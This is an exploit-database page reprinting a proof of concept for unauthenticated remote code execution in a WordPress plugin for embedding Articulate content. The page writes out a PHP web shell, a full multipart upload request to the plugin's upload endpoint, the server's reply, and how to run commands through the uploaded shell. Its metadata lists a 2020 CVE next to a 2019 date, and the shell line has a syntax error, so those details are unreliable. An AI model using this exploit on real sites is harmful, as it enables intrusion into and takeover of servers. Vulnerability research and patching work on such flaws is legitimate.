Advertisement






WordPress Plugin Insert or Embed Articulate Content into WordPress Remote Code Execution (Unautorize

CVE Category Price Severity
CVE-2020-8912 CWE-434 Not disclosed Critical
Author Risk Exploitation Type Date
Mohd Sadique Critical Remote 2019-06-28
CPE
cpe:cpe:/a:wordpress:wordpress-plugin-insert-or-embed-articulate-content-into-wordpress-remote-code-execution-unautorize
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.676 0.821

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019060146

Below is a copy:

WordPress Plugin Insert or Embed Articulate Content into WordPress Remote Code Execution (Unautorized)
# Authorized RCE : https://cxsecurity.com/issue/WLB-2019060137
# Author : Con7ext

1. Create File > index.php / whatever and index.html
EX: INDEX.html
<html>
HELLO WORLD
</html>
EX: INDEX.php
<?php system($_GET[cmd]; ?>
2. Compress it to zip
3. Make Request to /wordpress/index.php/wp-json/articulate/v1/upload-data
POST /wordpress/index.php/wp-json/articulate/v1/upload-data HTTP/1.1
Host: movie.boniw.io
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: */*
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://movie.boniw.io/wordpress/wp-admin/post.php?post=16&action=edit
Content-Type: multipart/form-data; boundary=---------------------------57052814523281
Content-Length: 808294
Connection: close

-----------------------------57052814523281
Content-Disposition: form-data; name="name"

whatever.zip
-----------------------------57052814523281
Content-Disposition: form-data; name="chunk"

2
-----------------------------57052814523281
Content-Disposition: form-data; name="chunks"

3
-----------------------------57052814523281
Content-Disposition: form-data; name="file"; filename="blob"
Content-Type: application/octet-stream

ANY

4. You will see the message like : 
{"OK": 1, "info": "Upload Complete!", "folder" : "kntl", "path" : "\/wp-content\/uploads\/articulate_uploads\/kntl\/index.html", "name" : {"file_name":"index.html","status":"index_html_file_found"}, "target": "/var/www/html/wordpress/wp-content/uploads/articulate_uploads/kntl"}
5. The you can see site.com/PATH ( site.com/wp-content/uploads/articulate_uploads/kntl/index.php )
6. The you can run command ( JUST ADDING ?cmd EX:  site.com/wp-content/uploads/articulate_uploads/kntl/index.php?cmd={COMMAND} )

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum